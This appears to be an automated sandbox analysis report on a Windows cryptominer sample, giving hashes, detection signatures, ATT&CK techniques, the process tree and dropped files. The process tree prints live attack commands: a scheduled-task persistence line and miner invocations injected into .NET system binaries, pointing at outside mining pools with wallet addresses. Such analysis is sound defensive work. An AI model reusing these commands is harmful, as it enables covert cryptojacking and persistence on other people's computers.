xmrig | 90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f

Analysis

max time kernel
299s
max time network
290s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
13/03/2023, 05:06

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe
Size

903KB
MD5

7b205c65f9092ee01c821aa5b58bcc6b
SHA1

28f2aeded861c37d6fd90ddb791721a653079cfb
SHA256

90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f
SHA512

1661d3a16938ec4e9c85510938b1af2598103c26b88cc2a60ea085350d4c38d10715dbceda5711b0b757d4abb7464d7ac7058e98b1a797f07d407f5ed74f0a84
SSDEEP

12288:8D5lJ0RelUsuvM/vPmyTIPjdgRSzYr9MUlu1vZdptUG5decIljrG:8D5lWYlUsuvMH+36e70

Score

10^/10

xmrig miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Detectes Phoenix Miner Payload 7 IoCs

miner

resource	yara_rule
behavioral2/memory/5064-158-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix
behavioral2/memory/5064-159-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix
behavioral2/memory/5064-160-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix
behavioral2/memory/5064-161-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix
behavioral2/memory/4268-242-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix
behavioral2/memory/4268-243-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix
behavioral2/memory/4268-244-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix

XMRig Miner payload 21 IoCs

miner

resource	yara_rule
behavioral2/memory/804-138-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/804-139-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/804-140-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/804-144-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/804-145-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/804-146-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/804-147-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/804-148-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/804-149-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/804-162-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/804-163-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/4708-226-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/4708-227-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/4708-229-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/4708-230-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/4708-231-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/4708-232-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/4708-233-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/4708-234-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/4708-288-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/4708-291-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Executes dropped EXE 2 IoCs

pid	Process
3240	Y.exe
1820	Y.exe

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/5064-155-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral2/memory/5064-156-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral2/memory/5064-157-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral2/memory/5064-158-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral2/memory/5064-159-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral2/memory/5064-160-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral2/memory/5064-161-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral2/memory/4268-242-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral2/memory/4268-243-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral2/memory/4268-244-0x0000000140000000-0x000000014082B000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
5064	RegSvcs.exe
5064	RegSvcs.exe
4268	RegSvcs.exe
4268	RegSvcs.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 3240 set thread context of 804	3240	Y.exe	74
PID 3240 set thread context of 5064	3240	Y.exe	75
PID 1820 set thread context of 4708	1820	Y.exe	85
PID 1820 set thread context of 4268	1820	Y.exe	86

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\1601268389\3877292338.pri	SearchUI.exe
File created	C:\Windows\rescache\_merged\1601268389\3877292338.pri	SearchUI.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3028	schtasks.exe
3940	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3040	timeout.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SearchUI.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	SearchUI.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SearchUI.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	SearchUI.exe

Modifies registry class 36 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.cortana	SearchUI.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "23"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185"	SearchUI.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchUI.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "56"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.cortana	SearchUI.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "56"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "23"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "23"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "56"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.cortana	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "23"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.cortana	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "56"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana	SearchUI.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchUI.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchUI.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
3240	Y.exe
3240	Y.exe
3240	Y.exe
1820	Y.exe
1820	Y.exe
1820	Y.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
652	Process not Found
652	Process not Found

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	2248	90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe
Token: SeDebugPrivilege	3240	Y.exe
Token: SeLockMemoryPrivilege	804	vbc.exe
Token: SeLockMemoryPrivilege	804	vbc.exe
Token: SeDebugPrivilege	1820	Y.exe
Token: SeLockMemoryPrivilege	4708	vbc.exe
Token: SeLockMemoryPrivilege	4708	vbc.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
804	vbc.exe
4708	vbc.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
4120	SearchUI.exe
5056	SearchUI.exe

Suspicious use of WriteProcessMemory 56 IoCs

description	pid	Process	procid_target
PID 2248 wrote to memory of 2484	2248	90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe	66
PID 2248 wrote to memory of 2484	2248	90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe	66
PID 2484 wrote to memory of 3040	2484	cmd.exe	68
PID 2484 wrote to memory of 3040	2484	cmd.exe	68
PID 2484 wrote to memory of 3240	2484	cmd.exe	69
PID 2484 wrote to memory of 3240	2484	cmd.exe	69
PID 3240 wrote to memory of 4400	3240	Y.exe	70
PID 3240 wrote to memory of 4400	3240	Y.exe	70
PID 4400 wrote to memory of 3028	4400	cmd.exe	72
PID 4400 wrote to memory of 3028	4400	cmd.exe	72
PID 3240 wrote to memory of 804	3240	Y.exe	74
PID 3240 wrote to memory of 804	3240	Y.exe	74
PID 3240 wrote to memory of 804	3240	Y.exe	74
PID 3240 wrote to memory of 804	3240	Y.exe	74
PID 3240 wrote to memory of 804	3240	Y.exe	74
PID 3240 wrote to memory of 804	3240	Y.exe	74
PID 3240 wrote to memory of 804	3240	Y.exe	74
PID 3240 wrote to memory of 804	3240	Y.exe	74
PID 3240 wrote to memory of 804	3240	Y.exe	74
PID 3240 wrote to memory of 804	3240	Y.exe	74
PID 3240 wrote to memory of 804	3240	Y.exe	74
PID 3240 wrote to memory of 804	3240	Y.exe	74
PID 3240 wrote to memory of 804	3240	Y.exe	74
PID 3240 wrote to memory of 804	3240	Y.exe	74
PID 3240 wrote to memory of 5064	3240	Y.exe	75
PID 3240 wrote to memory of 5064	3240	Y.exe	75
PID 3240 wrote to memory of 5064	3240	Y.exe	75
PID 3240 wrote to memory of 5064	3240	Y.exe	75
PID 3240 wrote to memory of 5064	3240	Y.exe	75
PID 3240 wrote to memory of 5064	3240	Y.exe	75
PID 3240 wrote to memory of 5064	3240	Y.exe	75
PID 1820 wrote to memory of 2556	1820	Y.exe	81
PID 1820 wrote to memory of 2556	1820	Y.exe	81
PID 2556 wrote to memory of 3940	2556	cmd.exe	84
PID 2556 wrote to memory of 3940	2556	cmd.exe	84
PID 1820 wrote to memory of 4708	1820	Y.exe	85
PID 1820 wrote to memory of 4708	1820	Y.exe	85
PID 1820 wrote to memory of 4708	1820	Y.exe	85
PID 1820 wrote to memory of 4708	1820	Y.exe	85
PID 1820 wrote to memory of 4708	1820	Y.exe	85
PID 1820 wrote to memory of 4708	1820	Y.exe	85
PID 1820 wrote to memory of 4708	1820	Y.exe	85
PID 1820 wrote to memory of 4708	1820	Y.exe	85
PID 1820 wrote to memory of 4708	1820	Y.exe	85
PID 1820 wrote to memory of 4708	1820	Y.exe	85
PID 1820 wrote to memory of 4708	1820	Y.exe	85
PID 1820 wrote to memory of 4708	1820	Y.exe	85
PID 1820 wrote to memory of 4708	1820	Y.exe	85
PID 1820 wrote to memory of 4708	1820	Y.exe	85
PID 1820 wrote to memory of 4268	1820	Y.exe	86
PID 1820 wrote to memory of 4268	1820	Y.exe	86
PID 1820 wrote to memory of 4268	1820	Y.exe	86
PID 1820 wrote to memory of 4268	1820	Y.exe	86
PID 1820 wrote to memory of 4268	1820	Y.exe	86
PID 1820 wrote to memory of 4268	1820	Y.exe	86
PID 1820 wrote to memory of 4268	1820	Y.exe	86

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe
"C:\Users\Admin\AppData\Local\Temp\90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpAA10.tmp.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2484
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:3040
- - C:\ProgramData\telemetry\Y.exe
    "C:\ProgramData\telemetry\Y.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3240
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "Y" /tr "C:\ProgramData\telemetry\Y.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4400
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "Y" /tr "C:\ProgramData\telemetry\Y.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:3028
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 42UrSm3AVbdGqvaeJZ41q5EbEH6mrmTPhftracKxsvSo3VKzs3bRkmeMLeuB5Jutkj8A8PzCDjP78gLghgUpSu2fRKrhE9F --tls --coin monero --max-cpu-usage=50 --donate-level=1 -opencl
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:804
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe -coin etc -pool etc-eu2.nanopool.org:19999 -wal 0x5d6Be357223Fa03F5ED7032BB88164dec43Ff631.work -log 0
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:5064

C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4120

C:\ProgramData\telemetry\Y.exe
C:\ProgramData\telemetry\Y.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1820
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "Y" /tr "C:\ProgramData\telemetry\Y.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2556
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "Y" /tr "C:\ProgramData\telemetry\Y.exe"
    3⤵
    - Creates scheduled task(s)
    PID:3940
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 42UrSm3AVbdGqvaeJZ41q5EbEH6mrmTPhftracKxsvSo3VKzs3bRkmeMLeuB5Jutkj8A8PzCDjP78gLghgUpSu2fRKrhE9F --tls --coin monero --max-cpu-usage=50 --donate-level=1 -opencl
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:4708
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe -coin etc -pool etc-eu2.nanopool.org:19999 -wal 0x5d6Be357223Fa03F5ED7032BB88164dec43Ff631.work -log 0
  2⤵
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:4268

C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5056

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\telemetry\Y.exe

Filesize
903KB

MD5
7b205c65f9092ee01c821aa5b58bcc6b

SHA1
28f2aeded861c37d6fd90ddb791721a653079cfb

SHA256
90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f

SHA512
1661d3a16938ec4e9c85510938b1af2598103c26b88cc2a60ea085350d4c38d10715dbceda5711b0b757d4abb7464d7ac7058e98b1a797f07d407f5ed74f0a84

Download Submit
C:\ProgramData\telemetry\Y.exe

Filesize
903KB

MD5
7b205c65f9092ee01c821aa5b58bcc6b

SHA1
28f2aeded861c37d6fd90ddb791721a653079cfb

SHA256
90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f

SHA512
1661d3a16938ec4e9c85510938b1af2598103c26b88cc2a60ea085350d4c38d10715dbceda5711b0b757d4abb7464d7ac7058e98b1a797f07d407f5ed74f0a84

Download Submit
C:\ProgramData\telemetry\Y.exe

Filesize
903KB

MD5
7b205c65f9092ee01c821aa5b58bcc6b

SHA1
28f2aeded861c37d6fd90ddb791721a653079cfb

SHA256
90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f

SHA512
1661d3a16938ec4e9c85510938b1af2598103c26b88cc2a60ea085350d4c38d10715dbceda5711b0b757d4abb7464d7ac7058e98b1a797f07d407f5ed74f0a84

Download Submit
C:\ProgramData\telemetry\chromeupdater.dat

Filesize
4.6MB

MD5
412ff258a6e1abc84d63455fdccfaf14

SHA1
b34119a96f9f0f3f994a3996681af99c013a8332

SHA256
f87a06752fd48643260a706ffc0b9f4b1c9ef0f152290437e566ee2551e18c84

SHA512
ed1a42ed5ebe311bcd26250ce00afb3fd11f8c1acb750b4b4917a4ad447dbe8067ff846dfcae22327100d7fbcc4d1e38d946007287f0feae17b2115d31276413

Download Submit
C:\ProgramData\telemetry\uninstall.dat

Filesize
5.1MB

MD5
a3d7148655137e92c28b33e48d088088

SHA1
bc98804abf481e58c925a0810c519c6c5f2d3ac0

SHA256
5b0bfb92bb76a12c69669a08ef723377b9eaaf50eab6fe83b4c3f21d593f998f

SHA512
ca131ce06bc6cbd47a58cc11f80a4db576effa3325f11222123fd6829589f29f894834679e09c3e50a50ef8019325d1a6fffab07d49fda43179a544ea4697373

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Y.exe.log

Filesize
1KB

MD5
9bfb0f51f319fb79c0bb1f4f9fcfc7e1

SHA1
367776be8a224b0ee8271dce1723eb675a1964b2

SHA256
35d5a38e77d2755271f2897bcfdd673d3d8daa0e6e412c7272fac51aacb101f3

SHA512
0b103c722c983d513724c36da13de8b18845c3a1e4a311326947e448d304a2dbdd717d914ceeb9e8e11a6083f8ccaf7abad1bf4a2ac22e21de91d6cc74ec17bb

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoft.windows.cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\HMM2HWB4\microsoft.windows[1].xml

Filesize
97B

MD5
28840f4f5ece807a664852066fb8f248

SHA1
a21e39c7615b591d90961c1d1abdd8be131bc2a1

SHA256
0fcd201e265363ed3e996671c86e0f878cde478fb62760bdb56ffa3544e1a3d0

SHA512
abe71f64d3c2078070168d33ef8804b9b5434763f2c38cdbee10871b846dd0c3486deb91f38a78304a7fcee7f224b513850cd04e1d4f5dd93971f18ba660fb0b

Download Submit
